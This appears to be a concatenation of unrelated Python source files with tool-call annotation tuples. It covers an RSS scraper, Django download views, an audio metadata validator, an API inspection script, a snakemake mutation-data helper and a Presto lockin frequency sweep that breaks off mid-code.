[((174, 295), 'pytest.fixture', 'pytest.fixture', ([], {'params': "['M', 'W', 'Man', 'Men', 'Women', 'Woman', 'male', 'female', None, 'NONE',\n 'N', 'w', 'm', 'f']"}), "(params=['M', 'W', 'Man', 'Men', 'Women', 'Woman', 'male',\n 'female', None, 'NONE', 'N', 'w', 'm', 'f'])\n", (188, 295), False, 'import pytest\n'), ((549, 593), 'pytest.fixture', 'pytest.fixture', ([], {'params': "[1, 'X', True, 'bar']"}), "(params=[1, 'X', True, 'bar'])\n", (563, 593), False, 'import pytest\n'), ((782, 871), 'pytest.fixture', 'pytest.fixture', ([], {'params': "[(Gender.M, 'Male'), (Gender.W, 'Female'), (Gender.N, 'None')]"}), "(params=[(Gender.M, 'Male'), (Gender.W, 'Female'), (Gender.N,\n 'None')])\n", (796, 871), False, 'import pytest\n'), ((513, 545), 'pytcnz.gender.Gender.from_string', 'Gender.from_string', (['valid_gender'], {}), '(valid_gender)\n', (531, 545), False, 'from pytcnz.gender import Gender, InvalidGenderError\n'), ((701, 734), 'pytest.raises', 'pytest.raises', (['InvalidGenderError'], {}), '(InvalidGenderError)\n', (714, 734), False, 'import pytest\n'), ((744, 778), 'pytcnz.gender.Gender.from_string', 'Gender.from_string', (['invalid_gender'], {}), '(invalid_gender)\n', (762, 778), False, 'from pytcnz.gender import Gender, InvalidGenderError\n'), ((994, 1027), 'pytcnz.gender.Gender.to_sex', 'Gender.to_sex', (['gender_sex_pair[0]'], {}), '(gender_sex_pair[0])\n', (1007, 1027), False, 'from pytcnz.gender import Gender, InvalidGenderError\n')]
|
import scrappers
import re
import scrappers.mixins
class CBSNews(scrappers.mixins.RSSScrapper, scrappers.Scrapper):
"""The CBS News RSS feeds scrapper.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def should_translate(self):
return False
def encoding(self):
return 'UTF-8'
def skipping_rules(self, title):
"""
:param title: The scraped title
:return: True if we want to skip, otherwise False.
"""
skip_regexs = [re.compile(r'^Photos\s+of\s+the\s+week', re.IGNORECASE)]
return any([r.match(title) for r in skip_regexs])
def resource_urls(self):
return [{'category': 'Top Stories', 'url': 'http://www.cbsnews.com/latest/rss/main'},
{'category': 'US', 'url': 'http://www.cbsnews.com/latest/rss/us'},
{'category': 'Sci-Tech', 'url': 'http://www.cbsnews.com/latest/rss/tech'},
{'category': 'World', 'url': 'http://www.cbsnews.com/latest/rss/world'},
{'category': 'Politics', 'url': 'http://www.cbsnews.com/latest/rss/politics'}]
|
[
"re.compile"
] |
[((536, 593), 're.compile', 're.compile', (['"""^Photos\\\\s+of\\\\s+the\\\\s+week"""', 're.IGNORECASE'], {}), "('^Photos\\\\s+of\\\\s+the\\\\s+week', re.IGNORECASE)\n", (546, 593), False, 'import re\n')]
|
#!/usr/bin/python3
import time
import dh.data
import dh.image
import dh.network
import dh.utils
###
#%% main
###
def main():
C = dh.network.ImageProcessingClient2("localhost")
# input
I = dh.data.lena()
params = {"gamma": 0.5}
print("Input:")
dh.image.pinfo(I)
# result
t0 = time.time()
(J, info) = C.process(I, params)
t1 = time.time()
# show result
print("Output:")
dh.image.pinfo(J)
print("Info:")
print(info)
print("Received result after {} ms".format(dh.utils.around((t1 - t0) * 1000.0)))
dh.image.show(dh.image.stack([I, J]), wait=0, closeWindow=True)
if __name__ == "__main__":
main()
|
[
"time.time"
] |
[((315, 326), 'time.time', 'time.time', ([], {}), '()\n', (324, 326), False, 'import time\n'), ((373, 384), 'time.time', 'time.time', ([], {}), '()\n', (382, 384), False, 'import time\n')]
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright 2013 Load Impact
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import optparse
import sys
import traceback
from loadimpact import (
ApiTokenClient, ApiError, DataStore, LoadZone, TestConfig, UserScenario,
__version__ as li_sdk_version)
def get_or_list(client, cls, resource_id=None):
if resource_id:
return [cls.get(client, resource_id)]
else:
return cls.list(client)
def inspect_resource(api_token, resource_name, resource_id=None, debug=False):
client = ApiTokenClient(api_token)
resources = []
if resource_name in ['ds', 'datastore', 'data-store', 'data_store']:
resources = get_or_list(client, DataStore, resource_id)
elif resource_name in ['lz', 'loadzone', 'load-zone', 'load_zone']:
resources = get_or_list(client, LoadZone, None)
elif resource_name in ['tc', 'testconfig', 'test-config', 'test_config']:
resources = get_or_list(client, TestConfig, resource_id)
elif resource_name in ['us', 'userscenario', 'user-scenario',
'user_scenario']:
resources = get_or_list(client, UserScenario, resource_id)
else:
raise RuntimeError("Unknown resource: %s" % resource_name)
for resource in resources:
print(repr(resource))
if __name__ == "__main__":
p = optparse.OptionParser(version=('%%prog %s' % li_sdk_version))
p.add_option('--api-token', action='store',
dest='api_token', default=None,
help=("Your Load Impact API token."))
p.add_option('--debug', action='store_true', dest='debug', default=False,
help=("."))
opts, args = p.parse_args()
if 1 > len(args):
print("You need to specify at least 1 argument (to list): "
"resource_name")
print("Specify 2 arguments (to get specific resource): resource_name, "
"resource_id")
sys.exit(2)
resource_name = args[0]
resource_id = None
if 1 < len(args):
resource_id = int(args[1])
try:
inspect_resource(opts.api_token, resource_name, resource_id=resource_id,
debug=opts.debug)
except ApiError:
print("Error encountered: %s" % traceback.format_exc())
|
[
"loadimpact.ApiTokenClient",
"sys.exit",
"traceback.format_exc",
"optparse.OptionParser"
] |
[((1033, 1058), 'loadimpact.ApiTokenClient', 'ApiTokenClient', (['api_token'], {}), '(api_token)\n', (1047, 1058), False, 'from loadimpact import ApiTokenClient, ApiError, DataStore, LoadZone, TestConfig, UserScenario, __version__ as li_sdk_version\n'), ((1841, 1900), 'optparse.OptionParser', 'optparse.OptionParser', ([], {'version': "('%%prog %s' % li_sdk_version)"}), "(version='%%prog %s' % li_sdk_version)\n", (1862, 1900), False, 'import optparse\n'), ((2433, 2444), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (2441, 2444), False, 'import sys\n'), ((2749, 2771), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (2769, 2771), False, 'import traceback\n')]
|
import glob
import json
import os
from wsgiref.util import FileWrapper
import shutil
import pandas as pd
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.http.response import HttpResponse
from django.shortcuts import render
from interface.models import DbQuery
from interface.models import StarsFilter
@login_required(login_url='login/')
def all_filters(request):
stars_filters_path = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters")
header = ["Job id", "Status", "Start date",
"Finish date", "Descriptors", "Deciders", "Link"]
dat = []
for star_filt in StarsFilter.objects.filter(user=request.user):
row = [star_filt.id,
star_filt.status,
str(star_filt.start_date),
str(star_filt.finish_date),
star_filt.descriptors.replace(";", "<br>"),
star_filt.deciders,
str(star_filt.id)]
dat.append(row)
table = pd.DataFrame(
dat, columns=["fold_name", "status", "start", "stop", "descr", "decid", "job_id"])
table["start"] = pd.to_datetime(table["start"])
table.sort_values(by="start", ascending=False, inplace=True)
job_ids = table["job_id"].values.tolist()
table = table.drop('job_id', 1)
return render(request, 'interface/jobs.html', {"page_title": "Star filter jobs",
"header": header,
"stars_filter": True,
"delete_prefix" : '"../{}/delete/"'.format(os.environ.get(
"DOCKYARD_APP_CONTEXT"), ""),
"table": zip(table.values.tolist(), job_ids)})
@login_required(login_url='login/')
def _all_filters(request):
stars_filters_path = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters")
header = ["Job id", "Status", "Date", "Descriptors", "Deciders", "Link"]
dat = []
for folder_name in os.listdir(stars_filters_path):
try:
with open(os.path.join(stars_filters_path, folder_name, "status.json"), 'r') as status_file:
status = json.load(status_file)
row = [folder_name,
status.get("status", ""),
status.get("start", ""),
status.get("descriptors", ""),
status.get("deciders", ""),
str(folder_name)]
dat.append(row)
except:
pass
table = pd.DataFrame(
dat, columns=["fold_name", "status", "start", "descr", "decid", "job_id"])
table["start"] = pd.to_datetime(table["start"])
table.sort_values(by="start", ascending=False, inplace=True)
job_ids = table["job_id"].values.tolist()
table = table.drop('job_id', 1)
return render(request, 'interface/jobs.html', {"page_title": "Star filter jobs",
"header": header,
"stars_filter": True,
"table": zip(table.values.tolist(), job_ids)})
@login_required(login_url='login/')
def all_results(request):
queries_path = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "query_results")
header = ["Job id", "Status", "Started",
"Finished", "Queries", "Connectors", "Link"]
dat = []
for query in DbQuery.objects.filter(user=request.user):
row = [query.id,
query.status,
str(query.start_date),
str(query.finish_date),
str(query.queries),
query.connectors,
str(query.id)]
dat.append(row)
table = pd.DataFrame(
dat, columns=["fold_name", "status", "started", "finished", "queries", "conn", "job_id"])
table["started"] = pd.to_datetime(table["started"])
table.sort_values(by="started", ascending=False, inplace=True)
job_ids = table["job_id"].values.tolist()
table = table.drop('job_id', 1)
return render(request, 'interface/jobs.html', {"page_title": "Queries jobs",
"stars_filter": False,
"header": header,
"delete_prefix": '"../{}/delete/"'.format(os.environ.get(
"DOCKYARD_APP_CONTEXT")),
"table": zip(table.values.tolist(), job_ids)})
def download_file(request, file_name):
"""
Send a file through Django without loading the whole file into
memory at once. The FileWrapper will turn the file object into an
iterator for chunks of 8KB.
"""
if file_name.startswith("estim"):
file_type = "estim"
file_name = file_name[9:]
filename = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters", file_name, "estimator")
elif not file_name.startswith("filt"):
file_type = "query"
filename = os.path.join(
settings.MEDIA_ROOT, str(request.user.id), "query_results", file_name + ".zip")
else:
file_type = "filter"
file_name = file_name[4:]
pa = os.path.join(settings.MEDIA_ROOT, str(request.user.id), "stars_filters", file_name)
filter_names = glob.glob(pa + "/*.filter")
if filter_names:
filter_name = os.path.basename(filter_names[0])
filename = os.path.join(
settings.MEDIA_ROOT, str(request.user.id), "stars_filters", file_name, filter_name)
else:
return render(request, 'interface/error_page.html', {"error_m": "There is no filter in %s" % file_name})
wrapper = FileWrapper(open(filename, 'rb'))
response = HttpResponse(wrapper, content_type='text/plain')
response['Content-Length'] = os.path.getsize(filename)
if file_type == "filter":
response[
'Content-Disposition'] = 'attachment; filename="%s.filter"' % filter_name
elif file_type == "estim":
response[
'Content-Disposition'] = 'attachment; filename="estimator"'
else:
response[
'Content-Disposition'] = 'attachment; filename="results_%s.zip"' % file_name
return response
|
[
"django.contrib.auth.decorators.login_required",
"pandas.DataFrame",
"json.load",
"os.path.basename",
"os.path.getsize",
"interface.models.StarsFilter.objects.filter",
"os.environ.get",
"pandas.to_datetime",
"glob.glob",
"django.shortcuts.render",
"interface.models.DbQuery.objects.filter",
"os.path.join",
"os.listdir",
"django.http.response.HttpResponse"
] |
[((361, 395), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""login/"""'}), "(login_url='login/')\n", (375, 395), False, 'from django.contrib.auth.decorators import login_required\n'), ((1854, 1888), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""login/"""'}), "(login_url='login/')\n", (1868, 1888), False, 'from django.contrib.auth.decorators import login_required\n'), ((3280, 3314), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""login/"""'}), "(login_url='login/')\n", (3294, 3314), False, 'from django.contrib.auth.decorators import login_required\n'), ((667, 712), 'interface.models.StarsFilter.objects.filter', 'StarsFilter.objects.filter', ([], {'user': 'request.user'}), '(user=request.user)\n', (693, 712), False, 'from interface.models import StarsFilter\n'), ((1026, 1125), 'pandas.DataFrame', 'pd.DataFrame', (['dat'], {'columns': "['fold_name', 'status', 'start', 'stop', 'descr', 'decid', 'job_id']"}), "(dat, columns=['fold_name', 'status', 'start', 'stop', 'descr',\n 'decid', 'job_id'])\n", (1038, 1125), True, 'import pandas as pd\n'), ((1152, 1182), 'pandas.to_datetime', 'pd.to_datetime', (["table['start']"], {}), "(table['start'])\n", (1166, 1182), True, 'import pandas as pd\n'), ((2128, 2158), 'os.listdir', 'os.listdir', (['stars_filters_path'], {}), '(stars_filters_path)\n', (2138, 2158), False, 'import os\n'), ((2655, 2746), 'pandas.DataFrame', 'pd.DataFrame', (['dat'], {'columns': "['fold_name', 'status', 'start', 'descr', 'decid', 'job_id']"}), "(dat, columns=['fold_name', 'status', 'start', 'descr', 'decid',\n 'job_id'])\n", (2667, 2746), True, 'import pandas as pd\n'), ((2773, 2803), 'pandas.to_datetime', 'pd.to_datetime', (["table['start']"], {}), "(table['start'])\n", (2787, 2803), True, 'import pandas as pd\n'), ((3568, 3609), 'interface.models.DbQuery.objects.filter', 'DbQuery.objects.filter', ([], {'user': 'request.user'}), '(user=request.user)\n', (3590, 3609), False, 'from interface.models import DbQuery\n'), ((3877, 3983), 'pandas.DataFrame', 'pd.DataFrame', (['dat'], {'columns': "['fold_name', 'status', 'started', 'finished', 'queries', 'conn', 'job_id']"}), "(dat, columns=['fold_name', 'status', 'started', 'finished',\n 'queries', 'conn', 'job_id'])\n", (3889, 3983), True, 'import pandas as pd\n'), ((4012, 4044), 'pandas.to_datetime', 'pd.to_datetime', (["table['started']"], {}), "(table['started'])\n", (4026, 4044), True, 'import pandas as pd\n'), ((6005, 6053), 'django.http.response.HttpResponse', 'HttpResponse', (['wrapper'], {'content_type': '"""text/plain"""'}), "(wrapper, content_type='text/plain')\n", (6017, 6053), False, 'from django.http.response import HttpResponse\n'), ((6087, 6112), 'os.path.getsize', 'os.path.getsize', (['filename'], {}), '(filename)\n', (6102, 6112), False, 'import os\n'), ((5559, 5586), 'glob.glob', 'glob.glob', (["(pa + '/*.filter')"], {}), "(pa + '/*.filter')\n", (5568, 5586), False, 'import glob\n'), ((1652, 1690), 'os.environ.get', 'os.environ.get', (['"""DOCKYARD_APP_CONTEXT"""'], {}), "('DOCKYARD_APP_CONTEXT')\n", (1666, 1690), False, 'import os\n'), ((2303, 2325), 'json.load', 'json.load', (['status_file'], {}), '(status_file)\n', (2312, 2325), False, 'import json\n'), ((4513, 4551), 'os.environ.get', 'os.environ.get', (['"""DOCKYARD_APP_CONTEXT"""'], {}), "('DOCKYARD_APP_CONTEXT')\n", (4527, 4551), False, 'import os\n'), ((5639, 5672), 'os.path.basename', 'os.path.basename', (['filter_names[0]'], {}), '(filter_names[0])\n', (5655, 5672), False, 'import os\n'), ((5843, 5945), 'django.shortcuts.render', 'render', (['request', '"""interface/error_page.html"""', "{'error_m': 'There is no filter in %s' % file_name}"], {}), "(request, 'interface/error_page.html', {'error_m': \n 'There is no filter in %s' % file_name})\n", (5849, 5945), False, 'from django.shortcuts import render\n'), ((2195, 2255), 'os.path.join', 'os.path.join', (['stars_filters_path', 'folder_name', '"""status.json"""'], {}), "(stars_filters_path, folder_name, 'status.json')\n", (2207, 2255), False, 'import os\n')]
|
from models.abstract_handler import BaseValidator
from configs.configs import dataset_type_asr, dataset_type_asr_unlabeled, dataset_type_tts, asr_minimum_words_per_min
import logging
from logging.config import dictConfig
log = logging.getLogger('file')
import audio_metadata
from word2number import w2n
from datetime import timedelta
import os
class AudioMetadataCheck(BaseValidator):
"""
Verifies the metadata for the audio file and
adds the durationInSeconds field. Also verifies
the correlation between the length of text and duration of audio clip
"""
def execute(self, request):
log.info('----Executing the audio file metadata check----')
try:
if request["datasetType"] in [dataset_type_asr, dataset_type_asr_unlabeled, dataset_type_tts]:
audio_file = request['record']['fileLocation']
try:
if os.path.exists(audio_file) and os.path.isfile(audio_file):
file_size = os.path.getsize(audio_file)
else:
log.info('The audio file does not exist in file store')
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
except Exception as e:
log.exception(f"Exception while accessing file from file store: {str(e)}")
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
if file_size == 0:
return {"message": "The audio file is unplayable, the filesize is 0 bytes", "code": "ZERO_BYTES_FILE", "status": "FAILED"}
try:
if os.path.exists(audio_file) and os.path.isfile(audio_file):
metadata = audio_metadata.load(audio_file)
else:
log.info('The audio file does not exist in file store')
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
except Exception as e:
log.exception(f"Exception while loading the audio file: {str(e)}")
return {"message": "Unable to load the audio file, file format is unsupported or the file is corrupt", "code": "INVALID_AUDIO_FILE", "status": "FAILED"}
if 'duration' in request['record'].keys():
request['record']['durationInSeconds'] = request['record']['duration']
elif 'startTime' in request['record'].keys() and 'endTime' in request['record'].keys():
h, m, s = request['record']['startTime'].split(':')
start_t = timedelta(hours=int(h), minutes=int(m), seconds=float(s))
h, m, s = request['record']['endTime'].split(':')
end_t = timedelta(hours=int(h), minutes=int(m), seconds=float(s))
request['record']['durationInSeconds'] = (end_t-start_t).total_seconds()
else:
request['record']['durationInSeconds'] = metadata.streaminfo.duration
if 'samplingRate' in request['record'].keys() and request['record']['samplingRate'] != None:
if metadata.streaminfo.sample_rate != request['record']['samplingRate']*1000:
error_message = 'Sampling rate does not match the specified value: Expected Value - ' + str(metadata.streaminfo.sample_rate/1000) + ', Specified Value - ' + str(request['record']['samplingRate'])
return {"message": error_message, "code": "INCORRECT_SAMPLING_RATE", "status": "FAILED"}
if 'bitsPerSample' in request['record'].keys() and request['record']['bitsPerSample'] != None:
if metadata.streaminfo.bit_depth != w2n.word_to_num(request['record']['bitsPerSample']):
error_message = 'Bits per sample does not match the specified value: Expected Value - ' + str(metadata.streaminfo.bit_depth) + ', Specified Value - ' + str(request['record']['bitsPerSample'])
return {"message": error_message, "code": "INCORRECT_BITS_PER_SAMPLE", "status": "FAILED"}
if request["datasetType"] in [dataset_type_asr, dataset_type_tts]:
num_words = len(list(request['record']['text'].split()))
words_per_minute = (num_words/request['record']['durationInSeconds'])*60
if words_per_minute < asr_minimum_words_per_min:
return {"message": "Number of words too less for the audio duration", "code": "AUDIO_TEXT_INVALID_CORRELATION", "status": "FAILED"}
log.info('----Audio metadata check -> Passed----')
return super().execute(request)
except Exception as e:
log.exception(f"Exception while executing Audio metadata check: {str(e)}")
return {"message": "Exception while executing Audio metadata check", "code": "SERVER_PROCESSING_ERROR", "status": "FAILED"}
# Log config
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {
'info': {
'class': 'logging.FileHandler',
'level': 'DEBUG',
'formatter': 'default',
'filename': 'info.log'
},
'console': {
'class': 'logging.StreamHandler',
'level': 'DEBUG',
'formatter': 'default',
'stream': 'ext://sys.stdout',
}
},
'loggers': {
'file': {
'level': 'DEBUG',
'handlers': ['info', 'console'],
'propagate': ''
}
},
'root': {
'level': 'DEBUG',
'handlers': ['info', 'console']
}
})
|
[
"os.path.getsize",
"os.path.exists",
"audio_metadata.load",
"os.path.isfile",
"logging.config.dictConfig",
"word2number.w2n.word_to_num",
"logging.getLogger"
] |
[((227, 252), 'logging.getLogger', 'logging.getLogger', (['"""file"""'], {}), "('file')\n", (244, 252), False, 'import logging\n'), ((5196, 5784), 'logging.config.dictConfig', 'dictConfig', (["{'version': 1, 'formatters': {'default': {'format':\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s'\n }}, 'handlers': {'info': {'class': 'logging.FileHandler', 'level':\n 'DEBUG', 'formatter': 'default', 'filename': 'info.log'}, 'console': {\n 'class': 'logging.StreamHandler', 'level': 'DEBUG', 'formatter':\n 'default', 'stream': 'ext://sys.stdout'}}, 'loggers': {'file': {'level':\n 'DEBUG', 'handlers': ['info', 'console'], 'propagate': ''}}, 'root': {\n 'level': 'DEBUG', 'handlers': ['info', 'console']}}"], {}), "({'version': 1, 'formatters': {'default': {'format':\n '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s'\n }}, 'handlers': {'info': {'class': 'logging.FileHandler', 'level':\n 'DEBUG', 'formatter': 'default', 'filename': 'info.log'}, 'console': {\n 'class': 'logging.StreamHandler', 'level': 'DEBUG', 'formatter':\n 'default', 'stream': 'ext://sys.stdout'}}, 'loggers': {'file': {'level':\n 'DEBUG', 'handlers': ['info', 'console'], 'propagate': ''}}, 'root': {\n 'level': 'DEBUG', 'handlers': ['info', 'console']}})\n", (5206, 5784), False, 'from logging.config import dictConfig\n'), ((904, 930), 'os.path.exists', 'os.path.exists', (['audio_file'], {}), '(audio_file)\n', (918, 930), False, 'import os\n'), ((935, 961), 'os.path.isfile', 'os.path.isfile', (['audio_file'], {}), '(audio_file)\n', (949, 961), False, 'import os\n'), ((999, 1026), 'os.path.getsize', 'os.path.getsize', (['audio_file'], {}), '(audio_file)\n', (1014, 1026), False, 'import os\n'), ((1783, 1809), 'os.path.exists', 'os.path.exists', (['audio_file'], {}), '(audio_file)\n', (1797, 1809), False, 'import os\n'), ((1814, 1840), 'os.path.isfile', 'os.path.isfile', (['audio_file'], {}), '(audio_file)\n', (1828, 1840), False, 'import os\n'), ((1877, 1908), 'audio_metadata.load', 'audio_metadata.load', (['audio_file'], {}), '(audio_file)\n', (1896, 1908), False, 'import audio_metadata\n'), ((3948, 3999), 'word2number.w2n.word_to_num', 'w2n.word_to_num', (["request['record']['bitsPerSample']"], {}), "(request['record']['bitsPerSample'])\n", (3963, 3999), False, 'from word2number import w2n\n')]
|
import os
import sys
import click
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask import redirect, url_for, abort, render_template, flash
from flask_wtf import FlaskForm
from wtforms import SubmitField, TextAreaField
from wtforms.validators import DataRequired
# SQLite URI compatible
WIN = sys.platform.startswith('win')
if WIN:
prefix = 'sqlite:///'
else:
prefix = 'sqlite:////'
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', prefix + os.path.join(app.root_path, 'data.db'))
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
@app.route('/')
def hello_world():
return 'Hello World!'
if __name__ == '__main__':
app.run()
|
[
"sys.platform.startswith",
"flask.Flask",
"os.path.join",
"flask_sqlalchemy.SQLAlchemy"
] |
[((320, 350), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win"""'], {}), "('win')\n", (343, 350), False, 'import sys\n'), ((425, 440), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (430, 440), False, 'from flask import Flask\n'), ((616, 631), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (626, 631), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((517, 555), 'os.path.join', 'os.path.join', (['app.root_path', '"""data.db"""'], {}), "(app.root_path, 'data.db')\n", (529, 555), False, 'import os\n')]
|
import pandas as pd
import logging
import os
import snakemake as snakemake_api
import tempfile
import yaml
from .constants import *
from .i_o import get_logger, get_df_drop_message
# Helper functions
def convert_with_map(row, index, convert_map):
try:
return convert_map[row[index]]
except KeyError:
return NAN_VAL
def clean_ssm_df(df):
"""Perform the final stage of standardization of a simple somatic mutation dataframe.
Parameters
----------
df : `pd.DataFrame`
A simple somatic mutation dataframe that contains all of the expected columns.
Returns
-------
`pd.DataFrame`
The dataframe with typed columns, sorted rows, and filtered rows (filtered if NaN/invalid chromosome, NaN start pos, or NaN end pos).
"""
# Drop mutations with NaN chromosome
filtered_df = df.dropna(subset=[COLNAME.CHR.value])
logging.debug(get_df_drop_message(COLNAME.CHR.value, "NaN value", df, filtered_df))
df = filtered_df
# Drop mutations with NaN start position
filtered_df = df.dropna(subset=[COLNAME.POS_START.value])
logging.debug(get_df_drop_message(COLNAME.POS_START.value, "NaN value", df, filtered_df))
df = filtered_df
# Drop mutations with NaN end position
filtered_df = df.dropna(subset=[COLNAME.POS_END.value])
logging.debug(get_df_drop_message(COLNAME.POS_END.value, "NaN value", df, filtered_df))
df = filtered_df
# Drop mutations with invalid chromosome
filtered_df = df.loc[df[COLNAME.CHR.value].isin(CHROMOSOMES)]
logging.debug(get_df_drop_message(COLNAME.CHR.value, "invalid value", df, filtered_df))
df = filtered_df
# Ensure correct types before sorting
df[COLNAME.CHR.value] = df[COLNAME.CHR.value].apply(str) # make sure everything is a string
df[COLNAME.POS_START.value] = df[COLNAME.POS_START.value].astype(int)
df[COLNAME.POS_END.value] = df[COLNAME.POS_END.value].astype(int)
# Sort the mutations by sample and then genomic location
df[COLNAME.CHR.value] = pd.Categorical(df[COLNAME.CHR.value], CHROMOSOMES, ordered=True)
df = df.sort_values([COLNAME.PATIENT.value, COLNAME.SAMPLE.value, COLNAME.CHR.value, COLNAME.POS_START.value])
# Restrict to the standard set of columns
return df[SSM_COLUMNS]
def run_snakemake_with_config(snakefile_path, config):
# Since snakemake() function can only handle "flat" dicts using the direct config= parameter,
# need to write the config dict to a temporary file and instead pass in to configfile=
try:
f = tempfile.NamedTemporaryFile(mode='w', delete=False)
yaml.dump(config, f, default_flow_style=False)
snakemake_api.snakemake(snakefile=snakefile_path, configfiles=[f.name])
f.close()
finally:
os.unlink(f.name)
|
[
"tempfile.NamedTemporaryFile",
"snakemake.snakemake",
"os.unlink",
"yaml.dump",
"pandas.Categorical"
] |
[((2036, 2100), 'pandas.Categorical', 'pd.Categorical', (['df[COLNAME.CHR.value]', 'CHROMOSOMES'], {'ordered': '(True)'}), '(df[COLNAME.CHR.value], CHROMOSOMES, ordered=True)\n', (2050, 2100), True, 'import pandas as pd\n'), ((2557, 2608), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'mode': '"""w"""', 'delete': '(False)'}), "(mode='w', delete=False)\n", (2584, 2608), False, 'import tempfile\n'), ((2617, 2663), 'yaml.dump', 'yaml.dump', (['config', 'f'], {'default_flow_style': '(False)'}), '(config, f, default_flow_style=False)\n', (2626, 2663), False, 'import yaml\n'), ((2672, 2743), 'snakemake.snakemake', 'snakemake_api.snakemake', ([], {'snakefile': 'snakefile_path', 'configfiles': '[f.name]'}), '(snakefile=snakefile_path, configfiles=[f.name])\n', (2695, 2743), True, 'import snakemake as snakemake_api\n'), ((2783, 2800), 'os.unlink', 'os.unlink', (['f.name'], {}), '(f.name)\n', (2792, 2800), False, 'import os\n')]
|
#!/bin/python3
# -*- coding: utf-8 -*-
import pandas
data = pandas.read_csv('./annser.csv',
header=0,
na_values=[''],
usecols=[0, 1, 3, 4])
abbrevs = ""
for index, rows in data.iterrows():
abbrev = "".join(
[s[:1] for s in (str(rows[1])).split(' ') if s[:1].isupper()]).lower()
if(str(rows[3]) == 'nan'):
rows[3] = "?" + abbrev
abbrevs += "".join([
"\\DefineJournal{",
abbrev,
"}{",
str(rows[3]),
"}\n{",
str(rows[0]),
"}\n{",
str(rows[1]),
"}\n"
])
file = open("annser-abbrev.tex", "w")
file.write(abbrevs)
file.close()
|
[
"pandas.read_csv"
] |
[((61, 140), 'pandas.read_csv', 'pandas.read_csv', (['"""./annser.csv"""'], {'header': '(0)', 'na_values': "['']", 'usecols': '[0, 1, 3, 4]'}), "('./annser.csv', header=0, na_values=[''], usecols=[0, 1, 3, 4])\n", (76, 140), False, 'import pandas\n')]
|
# -*- coding: utf-8 -*-
"""
2D sweep of drive power and frequency in Lockin mode.
"""
from typing import List
import h5py
import numpy as np
from presto.hardware import AdcFSample, AdcMode, DacFSample, DacMode
from presto import lockin
from presto.utils import ProgressBar
from _base import Base
DAC_CURRENT = 32_000 # uA
CONVERTER_CONFIGURATION = {
"adc_mode": AdcMode.Mixed,
"adc_fsample": AdcFSample.G4,
"dac_mode": DacMode.Mixed42,
"dac_fsample": DacFSample.G10,
}
class SweepPower(Base):
def __init__(
self,
freq_center: float,
freq_span: float,
df: float,
num_averages: int,
amp_arr: List[float],
output_port: int,
input_port: int,
dither: bool = True,
num_skip: int = 0,
) -> None:
self.freq_center = freq_center
self.freq_span = freq_span
self.df = df # modified after tuning
self.num_averages = num_averages
self.amp_arr = np.atleast_1d(amp_arr).astype(np.float64)
self.output_port = output_port
self.input_port = input_port
self.dither = dither
self.num_skip = num_skip
self.freq_arr = None # replaced by run
self.resp_arr = None # replaced by run
def run(
self,
presto_address: str,
presto_port: int = None,
ext_ref_clk: bool = False,
) -> str:
with lockin.Lockin(
address=presto_address,
port=presto_port,
ext_ref_clk=ext_ref_clk,
**CONVERTER_CONFIGURATION,
) as lck:
assert lck.hardware is not None
lck.hardware.set_adc_attenuation(self.input_port, 0.0)
lck.hardware.set_dac_current(self.output_port, DAC_CURRENT)
lck.hardware.set_inv_sinc(self.output_port, 0)
nr_amps = len(self.amp_arr)
# tune frequencies
_, self.df = lck.tune(0.0, self.df)
f_start = self.freq_center - self.freq_span / 2
f_stop = self.freq_center + self.freq_span / 2
n_start = int(round(f_start / self.df))
n_stop = int(round(f_stop / self.df))
n_arr = np.arange(n_start, n_stop + 1)
nr_freq = len(n_arr)
self.freq_arr = self.df * n_arr
self.resp_arr = np.zeros((nr_amps, nr_freq), np.complex128)
lck.hardware.configure_mixer(
freq=self.freq_arr[0],
in_ports=self.input_port,
out_ports=self.output_port,
)
lck.set_df(self.df)
og = lck.add_output_group(self.output_port, 1)
og.set_frequencies(0.0)
og.set_amplitudes(self.amp_arr[0])
og.set_phases(0.0, 0.0)
lck.set_dither(self.dither, self.output_port)
ig = lck.add_input_group(self.input_port, 1)
ig.set_frequencies(0.0)
lck.apply_settings()
pb = ProgressBar(nr_amps * nr_freq)
pb.start()
for jj, amp in enumerate(self.amp_arr):
og.set_amplitudes(amp)
lck.apply_settings()
for ii, freq in enumerate(self.freq_arr):
lck.hardware.configure_mixer(
freq=freq,
in_ports=self.input_port,
